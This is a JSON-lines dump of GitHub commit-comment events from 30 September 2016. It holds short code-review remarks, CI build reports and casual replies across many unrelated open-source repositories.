{"id":"4644827163","type":"CommitCommentEvent","actor":{"login":"jobevers"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":19245062,"position":9,"line":42,"path":"lbrynet/core/BlobAvailability.py","commit_id":"8d961d6ce63637149c3e2e144508223b9e6ffd4b","created_at":"2016-09-30T17:39:38Z","updated_at":"2016-09-30T17:39:38Z","body":"can be `have_blob = sum(1 for peer in peers if peer.is_available())`"}},"created_at":"2016-09-30T17:39:38Z"}
{"id":"4644829767","type":"CommitCommentEvent","actor":{"login":"jobevers"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":19245067,"position":20,"line":53,"path":"lbrynet/core/BlobAvailability.py","commit_id":"8d961d6ce63637149c3e2e144508223b9e6ffd4b","created_at":"2016-09-30T17:40:10Z","updated_at":"2016-09-30T17:40:10Z","body":"can be: `dl = [self.get_blob_availability(blob) for blob in blobs if blob]`"}},"created_at":"2016-09-30T17:40:10Z"}
{"id":"4644836990","type":"CommitCommentEvent","actor":{"login":"mrpeny"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":19245083,"position":null,"line":null,"path":null,"commit_id":"37175942a56af57fda23b699f976cf5a3d637ac8","created_at":"2016-09-30T17:41:35Z","updated_at":"2016-09-30T17:41:35Z","body":"So to sum it up compiler has cannot infer type argument without its implementation. Static methods with own type variables in interfaces can be used becase their argument can be inferred."}},"created_at":"2016-09-30T17:41:35Z"}
{"id":"4644837458","type":"CommitCommentEvent","actor":{"login":"mchamberland"},"repo":{"name":"nrc-cnrc/EGSnrc"},"payload":{"comment":{"id":19245085,"position":46,"line":476,"path":"HEN_HOUSE/egs++/egs_ensdf.cpp","commit_id":"f763c60c5193e127c409fd64bfd6171e26024049","created_at":"2016-09-30T17:41:41Z","updated_at":"2016-09-30T17:41:41Z","body":"Shouldn't `epsilon` be used for those types of checks?"}},"created_at":"2016-09-30T17:41:41Z"}
{"id":"4644837515","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19245086,"position":null,"line":null,"path":null,"commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T17:41:42Z","updated_at":"2016-09-30T17:41:42Z","body":"(Related to #726, but not only)."}},"created_at":"2016-09-30T17:41:42Z"}
{"id":"4644837537","type":"CommitCommentEvent","actor":{"login":"mrpeny"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":19245087,"position":null,"line":null,"path":null,"commit_id":"37175942a56af57fda23b699f976cf5a3d637ac8","created_at":"2016-09-30T17:41:42Z","updated_at":"2016-09-30T17:41:42Z","body":"Thanks Peter."}},"created_at":"2016-09-30T17:41:42Z"}
{"id":"4644838388","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19245094,"position":null,"line":null,"path":null,"commit_id":"b8fe3163051c9f7423aa3fa108eb9063b5e5445d","created_at":"2016-09-30T17:41:53Z","updated_at":"2016-09-30T17:41:53Z","body":"EMSIllumSetPoint (wfbuhl) - x86_64-MacOS-10.9-clang: OK (2338 of 2339 tests passed, 3 test warnings)\n\n * 3 tests had: AUD diffs.\n * 1 test had: ESO big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-30T17:41:53Z"}
{"id":"4644840217","type":"CommitCommentEvent","actor":{"login":"AnonXS"},"repo":{"name":"Looking4Group/L4G_Core"},"payload":{"comment":{"id":19245108,"position":null,"line":null,"path":null,"commit_id":"65679f1c0685121f152e140eeacc81a44dcc2dad","created_at":"2016-09-30T17:42:14Z","updated_at":"2016-09-30T17:42:14Z","body":":+1: "}},"created_at":"2016-09-30T17:42:14Z"}
{"id":"4644844763","type":"CommitCommentEvent","actor":{"login":"Quantumshark"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19245124,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T17:43:09Z","updated_at":"2016-09-30T17:43:09Z","body":"Is this by any chance in preparation for a future story arc?\r\n:)"}},"created_at":"2016-09-30T17:43:09Z"}
{"id":"4644845054","type":"CommitCommentEvent","actor":{"login":"emersonrodolv"},"repo":{"name":"RobWunderlich/Qlikview-Components"},"payload":{"comment":{"id":19245125,"position":4,"line":25,"path":"QVC_Source/Qvc_LinkTable.qvs","commit_id":"f595fbb3c74fd809e7cd048a077840ec4a5cb1f6","created_at":"2016-09-30T17:43:12Z","updated_at":"2016-09-30T17:43:12Z","body":"zxczcz"}},"created_at":"2016-09-30T17:43:12Z"}
{"id":"4644855931","type":"CommitCommentEvent","actor":{"login":"cirtapae2016"},"repo":{"name":"cirtapae2016/WSProduccionSn"},"payload":{"comment":{"id":19245151,"position":15,"line":15,"path":"WSProduccionSn/IService1.cs","commit_id":"3be7f568aecd8ac023bcba6d8b28487001eaefb0","created_at":"2016-09-30T17:45:19Z","updated_at":"2016-09-30T17:45:19Z","body":"porque este cambio amigo?"}},"created_at":"2016-09-30T17:45:19Z"}
{"id":"4644857698","type":"CommitCommentEvent","actor":{"login":"ad-m"},"repo":{"name":"hackerspace-silesia/hs_scripts"},"payload":{"comment":{"id":19245159,"position":93,"line":93,"path":"mail_meetings/hs_wiki.py","commit_id":"bb10bcf6004ca52de67b0940ef06a86431ea4e52","created_at":"2016-09-30T17:45:39Z","updated_at":"2016-09-30T17:45:39Z","body":"Zastanawiające, zważywszy że pozostała konfiguracja odbywa się przez zmienne środowiskowe. "}},"created_at":"2016-09-30T17:45:39Z"}
{"id":"4644860431","type":"CommitCommentEvent","actor":{"login":"mchamberland"},"repo":{"name":"nrc-cnrc/EGSnrc"},"payload":{"comment":{"id":19245168,"position":179,"line":1370,"path":"HEN_HOUSE/egs++/egs_ensdf.cpp","commit_id":"f763c60c5193e127c409fd64bfd6171e26024049","created_at":"2016-09-30T17:46:10Z","updated_at":"2016-09-30T17:46:10Z","body":"Commented out code is probably unnecessary with Git."}},"created_at":"2016-09-30T17:46:10Z"}
{"id":"4644863322","type":"CommitCommentEvent","actor":{"login":"renier"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19245185,"position":35,"line":42,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T17:46:44Z","updated_at":"2016-09-30T17:46:44Z","body":"how do you get the billing item below, if you don't have the mask for it here?\r\n\r\nAlso, it seems like the provision status is now read of of the billing order item, and not the billing item?"}},"created_at":"2016-09-30T17:46:44Z"}
{"id":"4644863606","type":"CommitCommentEvent","actor":{"login":"renier"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19245187,"position":26,"line":37,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T17:46:47Z","updated_at":"2016-09-30T17:46:47Z","body":"since this is in the order package, I would abbreviate to `CheckItemProvisionStatus`, to make the invocation `order.CheckItemProvisionStatus`. Any ambiguity worries are put to rest by the type system.\r\n\r\nI would also change it to accept an array of order items."}},"created_at":"2016-09-30T17:46:47Z"}
{"id":"4644864052","type":"CommitCommentEvent","actor":{"login":"2JN"},"repo":{"name":"Urigo/meteor-angular-socially"},"payload":{"comment":{"id":19245188,"position":17,"line":66,"path":"imports/ui/components/partyDetails/partyDetails.js","commit_id":"ef8c7d6558e6007484f71f5ffdaa21ad7303ec92","created_at":"2016-09-30T17:46:52Z","updated_at":"2016-09-30T17:46:52Z","body":"How wold you do it with a different element than the Meteor.userId() ? I can't use the Meteor.user() function inside the resolve.\r\n\r\nPd. sorry if my comment is misplaced, but I really need to know. "}},"created_at":"2016-09-30T17:46:52Z"}
{"id":"4644866933","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19245193,"position":null,"line":null,"path":null,"commit_id":"ed91cb4b4c39ec05cf96006d95460e9268a47a2b","created_at":"2016-09-30T17:47:23Z","updated_at":"2016-09-30T17:47:23Z","body":"@eregon "}},"created_at":"2016-09-30T17:47:23Z"}
{"id":"4644870658","type":"CommitCommentEvent","actor":{"login":"pb-jchin"},"repo":{"name":"GFA-spec/GFA-spec"},"payload":{"comment":{"id":19245203,"position":null,"line":null,"path":null,"commit_id":"6bd0a3b15f3bac7d94e0bce09d47ed0a9a80939a","created_at":"2016-09-30T17:48:05Z","updated_at":"2016-09-30T17:48:05Z","body":"We need to update the figure to reflect the `$` changes.   I can help if I have the source file of the figures. "}},"created_at":"2016-09-30T17:48:05Z"}
{"id":"4644871161","type":"CommitCommentEvent","actor":{"login":"bgrainger"},"repo":{"name":"bgrainger/MySqlConnector"},"payload":{"comment":{"id":19245204,"position":null,"line":null,"path":null,"commit_id":"a524341c10bb7bddc1b11077bd4a9927779e4ddc","created_at":"2016-09-30T17:48:11Z","updated_at":"2016-09-30T17:48:11Z","body":"This was rebased before pushing. Alpha 24 actually included everything up to 64d4f19afcc0d4dcc999f393da761c611797f600."}},"created_at":"2016-09-30T17:48:11Z"}
{"id":"4644871572","type":"CommitCommentEvent","actor":{"login":"Ayuto"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19245206,"position":null,"line":null,"path":null,"commit_id":"9c444775739566f37667e12dee482aa2e8d23a0d","created_at":"2016-09-30T17:48:15Z","updated_at":"2016-09-30T17:48:15Z","body":"Yep, but why should anyone do that?\r\n"}},"created_at":"2016-09-30T17:48:15Z"}
{"id":"4644872751","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19245209,"position":511,"line":523,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOReadWrite1.java","commit_id":"b0a111302bc8db1b3be63e81b08175cc958badce","created_at":"2016-09-30T17:48:30Z","updated_at":"2016-09-30T17:48:30Z","body":"Is that true?  If so, please report a bug so we can fix it.  I think what you mean is \"there will be a difference on timezones between client and ML server values\".  But the underlying time should be the same if both are converted to UTC.  Also, I should point out that version 2.8.3 of Jenkins is converting things to UTC automatically on deserialization (not on serialization) so looking at timezones can be pretty tricky."}},"created_at":"2016-09-30T17:48:30Z"}
{"id":"4644873301","type":"CommitCommentEvent","actor":{"login":"renier"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19245215,"position":35,"line":42,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T17:48:38Z","updated_at":"2016-09-30T17:48:38Z","body":"I see that you are `GetBillingItem()` below instead of `GetObject`()."}},"created_at":"2016-09-30T17:48:38Z"}
{"id":"4644880244","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19245240,"position":417,"line":429,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOReadWrite1.java","commit_id":"b0a111302bc8db1b3be63e81b08175cc958badce","created_at":"2016-09-30T17:49:59Z","updated_at":"2016-09-30T17:49:59Z","body":"Could we get rid of \"count\" and hard-code the above to this so it's validating that the the query matched something (page.size() is not zero)?\r\n\r\n    assertEquals(\"Page size\",1, p.size());\r\n"}},"created_at":"2016-09-30T17:49:59Z"}
{"id":"4644880755","type":"CommitCommentEvent","actor":{"login":"Amarender2"},"repo":{"name":"Amarender2/RESTWebServices"},"payload":{"comment":{"id":19245241,"position":27,"line":34,"path":"messenger/src/main/java/com/amar/restful/messenger/service/CommentService.java","commit_id":"122f04193fa138fd07337a3054a4b6271bc49a76","created_at":"2016-09-30T17:50:06Z","updated_at":"2016-09-30T17:50:06Z","body":"throw new NotFoundException(response);"}},"created_at":"2016-09-30T17:50:06Z"}
{"id":"4644882341","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19245248,"position":416,"line":428,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOReadWrite1.java","commit_id":"b0a111302bc8db1b3be63e81b08175cc958badce","created_at":"2016-09-30T17:50:24Z","updated_at":"2016-09-30T17:50:24Z","body":"Could we get rid of \"count\" and hard-code the above to this so it's validating that the the query matched something (page.size() is not zero)?\r\n\r\n    assertEquals(\"Page size\",1, p.size());\r\n"}},"created_at":"2016-09-30T17:50:24Z"}
{"id":"4644883153","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19245253,"position":455,"line":467,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOReadWrite1.java","commit_id":"b0a111302bc8db1b3be63e81b08175cc958badce","created_at":"2016-09-30T17:50:33Z","updated_at":"2016-09-30T17:50:33Z","body":"Could we get rid of \"count\" and hard-code the above to this so it's validating that the the query matched something (page.size() is not zero)?\r\n\r\n    assertEquals(\"Page size\",1, p.size());\r\n"}},"created_at":"2016-09-30T17:50:33Z"}
{"id":"4644883732","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19245255,"position":34,"line":65,"path":"spec/mongoid/configuration_spec.rb","commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T17:50:41Z","updated_at":"2016-09-30T17:50:41Z","body":"The `previous_down_arrow` naming was a mistake on my part. It's the *default* down arrow. Changing the options local var naming from 'before' to 'default' gives us `default[:down_arrow]`, which IMHO expresses its identity both correctly and clearly enough that no intermediary local var is needed for clarity."}},"created_at":"2016-09-30T17:50:41Z"}
{"id":"4644886846","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19245264,"position":45,"line":392,"path":"src/gallium/state_trackers/nine/nine_pipe.h","commit_id":"98110d78cf2a214f8cba646a390328da0f4bb512","created_at":"2016-09-30T17:51:19Z","updated_at":"2016-09-30T17:51:19Z","body":"I don't see the problem here, as the format and sample count is checked in d3d9_to_pipe_format_checked. Why should I care about X8R8G8B8? "}},"created_at":"2016-09-30T17:51:19Z"}
{"id":"4644887326","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19245269,"position":483,"line":495,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOReadWrite1.java","commit_id":"b0a111302bc8db1b3be63e81b08175cc958badce","created_at":"2016-09-30T17:51:26Z","updated_at":"2016-09-30T17:51:26Z","body":"Could we get rid of \"count\" and hard-code the above to this so it's validating that the the query matched something (page.size() is not zero)?\r\n\r\n    assertEquals(\"Page size\",1, p.size());\r\n"}},"created_at":"2016-09-30T17:51:26Z"}
{"id":"4644888554","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19245276,"position":49,"line":69,"path":"spec/mongoid/configuration_spec.rb","commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T17:51:42Z","updated_at":"2016-09-30T17:51:42Z","body":"My comment above applies here as well."}},"created_at":"2016-09-30T17:51:42Z"}
{"id":"4644888597","type":"CommitCommentEvent","actor":{"login":"rix1337"},"repo":{"name":"rix1337/RSScrawler"},"payload":{"comment":{"id":19245277,"position":null,"line":null,"path":null,"commit_id":"5c0c8f09b15b3333256b8ec22f245264b7adc665","created_at":"2016-09-30T17:51:42Z","updated_at":"2016-09-30T17:51:42Z","body":"Ließ sich mit vorigem Tag nicht speichern."}},"created_at":"2016-09-30T17:51:42Z"}
{"id":"4644895822","type":"CommitCommentEvent","actor":{"login":"shortdudey123"},"repo":{"name":"dev-sec/chef-ssh-hardening"},"payload":{"comment":{"id":19245301,"position":null,"line":null,"path":null,"commit_id":"7454b7b221da2b10e4e6994c4d27a45389bb395e","created_at":"2016-09-30T17:53:10Z","updated_at":"2016-09-30T17:53:10Z","body":"@elijah looks like `Systemd` has been preferred over `Upstart` for debain based systems for almost 2 yrs"}},"created_at":"2016-09-30T17:53:10Z"}
{"id":"4644895837","type":"CommitCommentEvent","actor":{"login":"lukaseder"},"repo":{"name":"jOOQ/jOOQ"},"payload":{"comment":{"id":19245302,"position":142,"line":367,"path":"jOOQ/src/main/java/org/jooq/SQLDialect.java","commit_id":"733496d283753826400007b88c12be78f49f7a07","created_at":"2016-09-30T17:53:10Z","updated_at":"2016-09-30T17:53:10Z","body":"1. Copy paste error\r\n2. Don't worry about it. Found a better solution :)"}},"created_at":"2016-09-30T17:53:10Z"}
{"id":"4644898770","type":"CommitCommentEvent","actor":{"login":"moshechaikin"},"repo":{"name":"moshechaikin/TAScience"},"payload":{"comment":{"id":19245309,"position":6,"line":13,"path":"css/main.css","commit_id":"739be24cf8661ff2614a729f3b60448541b11c58","created_at":"2016-09-30T17:53:45Z","updated_at":"2016-09-30T17:53:45Z","body":"take away that comment of nothing here yet. Lol. There is something there!"}},"created_at":"2016-09-30T17:53:45Z"}
{"id":"4644900100","type":"CommitCommentEvent","actor":{"login":"DrZed"},"repo":{"name":"HxCKDMS/HxCCore"},"payload":{"comment":{"id":19245313,"position":null,"line":null,"path":null,"commit_id":"254c7c267bbbfa54edcdf2160e91e076be72738b","created_at":"2016-09-30T17:54:00Z","updated_at":"2016-09-30T17:54:00Z","body":"Yay"}},"created_at":"2016-09-30T17:54:00Z"}
{"id":"4644901098","type":"CommitCommentEvent","actor":{"login":"YDixler"},"repo":{"name":"moshechaikin/TAScience"},"payload":{"comment":{"id":19245318,"position":6,"line":13,"path":"css/main.css","commit_id":"739be24cf8661ff2614a729f3b60448541b11c58","created_at":"2016-09-30T17:54:12Z","updated_at":"2016-09-30T17:54:12Z","body":"lol\n\n\nOn Fri, Sep 30, 2016 at 1:53 PM, Moshe <notifications@github.com> wrote:\n\n> take away that comment of nothing here yet. Lol. There is something there!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/moshechaikin/TAScience/commit/739be24cf8661ff2614a729f3b60448541b11c58#commitcomment-19245309>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVa8gH4sPxEJftGe0LEUmA4XlJKEnsRFks5qvUyqgaJpZM4KLWJm>\n> .\n>\n"}},"created_at":"2016-09-30T17:54:12Z"}
{"id":"4644902325","type":"CommitCommentEvent","actor":{"login":"lmdodd"},"repo":{"name":"lmdodd/UWAnalysis"},"payload":{"comment":{"id":19245320,"position":1017,"line":1174,"path":"Configuration/python/tools/ntupleToolsHTauTau_WIP.py","commit_id":"7b1719aadba86f494400b92c4f6d54e81f960438","created_at":"2016-09-30T17:54:27Z","updated_at":"2016-09-30T17:54:27Z","body":"REvert back the change\r\n\r\n"}},"created_at":"2016-09-30T17:54:27Z"}
{"id":"4644903371","type":"CommitCommentEvent","actor":{"login":"lmdodd"},"repo":{"name":"lmdodd/UWAnalysis"},"payload":{"comment":{"id":19245325,"position":1006,"line":1150,"path":"Configuration/python/tools/ntupleToolsHTauTau_WIP.py","commit_id":"7b1719aadba86f494400b92c4f6d54e81f960438","created_at":"2016-09-30T17:54:39Z","updated_at":"2016-09-30T17:54:39Z","body":"REvert back this change\r\n"}},"created_at":"2016-09-30T17:54:39Z"}
{"id":"4644904179","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19245328,"position":49,"line":69,"path":"spec/ransack/configuration_spec.rb","commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T17:54:49Z","updated_at":"2016-09-30T17:54:49Z","body":"And here."}},"created_at":"2016-09-30T17:54:49Z"}
{"id":"4644904844","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19245332,"position":34,"line":65,"path":"spec/ransack/configuration_spec.rb","commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T17:54:57Z","updated_at":"2016-09-30T17:54:57Z","body":"And here."}},"created_at":"2016-09-30T17:54:57Z"}
{"id":"4644906558","type":"CommitCommentEvent","actor":{"login":"lmdodd"},"repo":{"name":"lmdodd/UWAnalysis"},"payload":{"comment":{"id":19245338,"position":949,"line":1065,"path":"Configuration/python/tools/ntupleToolsHTauTau_WIP.py","commit_id":"7b1719aadba86f494400b92c4f6d54e81f960438","created_at":"2016-09-30T17:55:18Z","updated_at":"2016-09-30T17:55:18Z","body":"Add these back\r\n"}},"created_at":"2016-09-30T17:55:18Z"}
{"id":"4644907732","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19245345,"position":null,"line":null,"path":null,"commit_id":"f3e39923b93052f967dada9c7879d2d38d053dc8","created_at":"2016-09-30T17:55:32Z","updated_at":"2016-09-30T17:55:32Z","body":"It is less efficient. It's the way it's done in wine. I'm OK with dropping this one."}},"created_at":"2016-09-30T17:55:32Z"}
{"id":"4644908021","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19245347,"position":80,"line":94,"path":"spec/ransack/configuration_spec.rb","commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T17:55:35Z","updated_at":"2016-09-30T17:55:35Z","body":"`default[:down_arrow]` is clearer to me than `before[:down_arrow]`."}},"created_at":"2016-09-30T17:55:35Z"}
{"id":"4644908052","type":"CommitCommentEvent","actor":{"login":"lmdodd"},"repo":{"name":"lmdodd/UWAnalysis"},"payload":{"comment":{"id":19245348,"position":939,"line":1053,"path":"Configuration/python/tools/ntupleToolsHTauTau_WIP.py","commit_id":"7b1719aadba86f494400b92c4f6d54e81f960438","created_at":"2016-09-30T17:55:35Z","updated_at":"2016-09-30T17:55:35Z","body":"Add these back\r\n"}},"created_at":"2016-09-30T17:55:35Z"}
{"id":"4644908900","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19245352,"position":455,"line":467,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOReadWrite1.java","commit_id":"b0a111302bc8db1b3be63e81b08175cc958badce","created_at":"2016-09-30T17:55:47Z","updated_at":"2016-09-30T17:55:47Z","body":"Oops, nevermind.  I see that you have an assert just above that does exactly what I wanted.  Looks like th ecount needs to be 14.  "}},"created_at":"2016-09-30T17:55:47Z"}
{"id":"4644909792","type":"CommitCommentEvent","actor":{"login":"lmdodd"},"repo":{"name":"lmdodd/UWAnalysis"},"payload":{"comment":{"id":19245354,"position":905,"line":1021,"path":"Configuration/python/tools/ntupleToolsHTauTau_WIP.py","commit_id":"7b1719aadba86f494400b92c4f6d54e81f960438","created_at":"2016-09-30T17:55:56Z","updated_at":"2016-09-30T17:55:56Z","body":"Add these back\r\n"}},"created_at":"2016-09-30T17:55:56Z"}
{"id":"4644910525","type":"CommitCommentEvent","actor":{"login":"msaveleva"},"repo":{"name":"panidomu/taksa"},"payload":{"comment":{"id":19245357,"position":4,"line":24,"path":"main.c","commit_id":"9737fba9f4712831852df4e1fd3704e9804c44f2","created_at":"2016-09-30T17:56:05Z","updated_at":"2016-09-30T17:56:05Z","body":"Молодец! "}},"created_at":"2016-09-30T17:56:05Z"}
{"id":"4644911788","type":"CommitCommentEvent","actor":{"login":"panidomu"},"repo":{"name":"panidomu/taksa"},"payload":{"comment":{"id":19245363,"position":4,"line":24,"path":"main.c","commit_id":"9737fba9f4712831852df4e1fd3704e9804c44f2","created_at":"2016-09-30T17:56:19Z","updated_at":"2016-09-30T17:56:19Z","body":"да!\r\n"}},"created_at":"2016-09-30T17:56:19Z"}
{"id":"4644913247","type":"CommitCommentEvent","actor":{"login":"chrislim"},"repo":{"name":"ceaseless-prayer/ceaseless-static"},"payload":{"comment":{"id":19245368,"position":null,"line":null,"path":null,"commit_id":"13181f199b3f62db41796158a3be100741ee9f98","created_at":"2016-09-30T17:56:36Z","updated_at":"2016-09-30T17:56:36Z","body":"You're missing stuff in this commit. We have to change the button classes to use .download-btn"}},"created_at":"2016-09-30T17:56:36Z"}
{"id":"4644913369","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19245370,"position":80,"line":94,"path":"spec/mongoid/configuration_spec.rb","commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T17:56:37Z","updated_at":"2016-09-30T17:56:37Z","body":"`default[:down_arrow]` is clearer to me than `before[:down_arrow]`."}},"created_at":"2016-09-30T17:56:37Z"}
{"id":"4644914420","type":"CommitCommentEvent","actor":{"login":"rwest"},"repo":{"name":"CHME5137/github-assignment"},"payload":{"comment":{"id":19245373,"position":null,"line":null,"path":null,"commit_id":"f3fe6485f4746666de013952631c6964f18cd405","created_at":"2016-09-30T17:56:50Z","updated_at":"2016-09-30T17:56:50Z","body":"@CFulco - git thinks your email address is \"<cameron.fulco@corp.local>\" which isn't recognized by github so it can't tell that you made this commit. On the computer you made the commit, be sure to complete the `git config --global user.email` settings etc. (or `git config --global --edit`). "}},"created_at":"2016-09-30T17:56:50Z"}
{"id":"4644915480","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19245377,"position":454,"line":466,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOReadWrite1.java","commit_id":"b0a111302bc8db1b3be63e81b08175cc958badce","created_at":"2016-09-30T17:57:04Z","updated_at":"2016-09-30T17:57:04Z","body":"I think you want to reverse the expected (14) and actual (count) params.  Expected is supposed to come first."}},"created_at":"2016-09-30T17:57:04Z"}
{"id":"4644918407","type":"CommitCommentEvent","actor":{"login":"aliasfalse"},"repo":{"name":"nspacestd/hekbot"},"payload":{"comment":{"id":19245389,"position":null,"line":null,"path":null,"commit_id":"7db9bc9f8088fcad4c72543bf1200e6e2e2c1da7","created_at":"2016-09-30T17:57:37Z","updated_at":"2016-09-30T17:57:37Z","body":"+1"}},"created_at":"2016-09-30T17:57:37Z"}
{"id":"4644919921","type":"CommitCommentEvent","actor":{"login":"sammefford"},"repo":{"name":"marklogic/java-client-api"},"payload":{"comment":{"id":19245395,"position":483,"line":495,"path":"test-complete/src/test/java/com/marklogic/client/functionaltest/TestPOJOReadWrite1.java","commit_id":"b0a111302bc8db1b3be63e81b08175cc958badce","created_at":"2016-09-30T17:57:55Z","updated_at":"2016-09-30T17:57:55Z","body":"Nevermind, as above, your assert just before this addresses my concern.  Only the first comment like this still needs a check on count."}},"created_at":"2016-09-30T17:57:55Z"}
{"id":"4644922679","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19245401,"position":null,"line":null,"path":null,"commit_id":"7d9481e70383d76c8b77fc6d073120f96fa1f695","created_at":"2016-09-30T17:58:27Z","updated_at":"2016-09-30T17:58:27Z","body":":+1: "}},"created_at":"2016-09-30T17:58:27Z"}
{"id":"4644931766","type":"CommitCommentEvent","actor":{"login":"frankiefu"},"repo":{"name":"Polymer/polymer"},"payload":{"comment":{"id":19245432,"position":246,"line":263,"path":"src/utils/polymer.dom.html","commit_id":"79dcd2f88a3c71e128a9a49e3174379c89de95e3","created_at":"2016-09-30T18:00:13Z","updated_at":"2016-09-30T18:00:13Z","body":"Should this be `this.node[name] = value;`?"}},"created_at":"2016-09-30T18:00:13Z"}
{"id":"4644932699","type":"CommitCommentEvent","actor":{"login":"thegenemyers"},"repo":{"name":"GFA-spec/GFA-spec"},"payload":{"comment":{"id":19245437,"position":null,"line":null,"path":null,"commit_id":"6bd0a3b15f3bac7d94e0bce09d47ed0a9a80939a","created_at":"2016-09-30T18:00:23Z","updated_at":"2016-09-30T18:00:23Z","body":"I'm working on it now, you just happen to look at it while I'm changing it.\n    Cheers,\n        Gene\n\nP.S. You and Chris might want to note that I've upgraded all the \ndaligner tools so that\nthey no longer produce all the thread files but simply one or to block \npair files per\ncomparison.  This simplifies all the scripts and reduces the amount of \nIO.  I recently\ntested it by rerunning the scrubbed Zfish data and it was a much more \npleasant experience\nwith no lost jobs due to IO issues.\n\nAlso, did you try Falcon on the scrubbed Z-fish data?\n\n\nOn 9/30/16, 7:48 PM, Jason Chin wrote:\n>\n> We need to update the figure to reflect the |$| changes. I can help if \n> I have the source file of the figures.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/GFA-spec/GFA-spec/commit/6bd0a3b15f3bac7d94e0bce09d47ed0a9a80939a#commitcomment-19245203>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AGkkNl_xoVNOk7VKquSKIYqi5cWy9no2ks5qvUtWgaJpZM4KLV1f>.\n>\n\n"}},"created_at":"2016-09-30T18:00:23Z"}
